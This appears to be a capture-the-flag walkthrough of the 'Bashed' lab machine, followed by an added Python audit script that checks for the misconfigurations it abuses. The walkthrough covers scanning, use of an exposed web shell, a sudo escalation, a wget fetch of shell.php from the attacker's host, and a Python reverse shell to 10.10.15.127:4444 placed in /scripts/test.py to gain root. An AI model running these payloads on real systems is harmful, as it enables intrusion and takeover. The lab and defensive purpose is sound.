Bashed
External Enumeration
Nmap
nmap -sV -sC -T4 10.129.45.115
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-24 15:05 EST
Nmap scan report for 10.129.45.115
Host is up (0.036s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds
Only port 80 is open. Checking all TCP ports (-p-) and UDP to be sure.
nmap -p- 10.129.45.115 (Still only showing port 80)
nmap -sU 10.129.45.115 (No New Ports)
HTTP (80)
Enumerating Directories
gobuster dir -u http://10.129.45.115 -w /usr/share/dirb/wordlists/common.txt
/.hta (Status: 403) [Size: 292]
/.htaccess (Status: 403) [Size: 297]
/.htpasswd (Status: 403) [Size: 297]
/css (Status: 301) [Size: 312] [--> http://10.129.45.115/css/]
/dev (Status: 301) [Size: 312] [--> http://10.129.45.115/dev/]
/fonts (Status: 301) [Size: 314] [--> http://10.129.45.115/fonts/]
/images (Status: 301) [Size: 315] [--> http://10.129.45.115/images/]
/index.html (Status: 200) [Size: 7743]
/js (Status: 301) [Size: 311] [--> http://10.129.45.115/js/]
/php (Status: 301) [Size: 312] [--> http://10.129.45.115/php/]
/server-status (Status: 403) [Size: 301]
/uploads (Status: 301) [Size: 316] [--> http://10.129.45.115/uploads/]
Checking the directories, /dev contains a web shell, phpbash.php
Submitting User Flag
cat /home/arrexel/user.txt
Enumerating User Permissions
www-data@bashed:/home/arrexel# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data can run any command as the user scriptmanager with no password needed
Trying to run commands as scriptmanager
www-data@bashed:/# sudo -u scriptmanager whoami
scriptmanager
We can run commands as scriptmanager.
From checking the / directory, scriptmanager probably has access to /scripts
www-data@bashed:/# sudo -u scriptmanager ls -la /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Dec 24 12:36 test.txt
We can read /scripts
Reading test.py and test.txt doesn’t provide anything.
Create Reverse Shell
Create shell.php & download to webshell
python3 -m http.server
www-data@bashed:/var/www/html/uploads# wget http://10.10.15.127:8000/shell.php
Start Listener and go to file
nc -nvlp 4444
go to http://10.129.45.115/uploads/shell.php
Reverse shell has been received
Stabilize Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + z
stty raw -echo; fg
stty rows 38 columns 116
Start Shell as ScriptManager
sudo -u scriptmanager /bin/bash
Create Revshell to run as Root in test.py
Create test.py and transfer
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.127",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])
wget http://10.10.15.127:8000/test.py
Setup Listener to connect to root shell
nc -nvlp 4444
Received Root Shell
cat /root/flag.txt
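The two misconfigurations this walkthrough relies on, the NOPASSWD: ALL sudo rule for www-data and a root-written file sitting in the scriptmanager-owned /scripts directory, can be audited for on your own hosts. The Python check below is an added example, not part of the original write-up: the sample input is the command output shown above, the directory check is a heuristic, and SERVICE_ACCOUNTS and the function names are assumptions.

```python
import re

# Constructed sample input: the `sudo -l` and `ls -la /scripts` output shown above.
SUDO_L = """User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL"""
LS_SCRIPTS = """total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Dec 24 12:36 test.txt"""

# Assumption: accounts that should never hold broad sudo rights on this host.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

def audit_sudo(text):
    """Return 'user -> runas' for service accounts granted NOPASSWD: ALL."""
    findings, user = [], None
    for line in text.splitlines():
        m = re.match(r"User (\S+) may run the following commands", line)
        if m:
            user = m.group(1)
            continue
        m = re.match(r"\s*\(([^\s:)]+)[^)]*\)\s+NOPASSWD:\s*ALL\s*$", line)
        if m and user in SERVICE_ACCOUNTS:
            findings.append(f"{user} -> {m.group(1)}")
    return findings

def audit_listing(text):
    """Heuristic: flag a non-root-owned directory that holds both root-written
    files and non-root-owned scripts, a sign that a root job runs code there."""
    rows = [l.split() for l in text.splitlines()]
    rows = [(r[2], " ".join(r[8:])) for r in rows if len(r) >= 9]  # (owner, name)
    dir_owner = next((o for o, n in rows if n == "."), None)
    if dir_owner in (None, "root"):
        return None
    files = [(o, n) for o, n in rows if n not in (".", "..")]
    root_written = [n for o, n in files if o == "root"]
    scripts = [n for o, n in files if o != "root" and n.endswith((".py", ".sh"))]
    if root_written and scripts:
        return {"dir_owner": dir_owner, "root_written": root_written,
                "replaceable_scripts": scripts}
    return None

if __name__ == "__main__":
    print("sudo:", audit_sudo(SUDO_L))
    print("/scripts:", audit_listing(LS_SCRIPTS))
```

Fixing either finding breaks the chain: remove the sudo rule for www-data, and keep any script that root executes in a root-owned directory that no other user can write to.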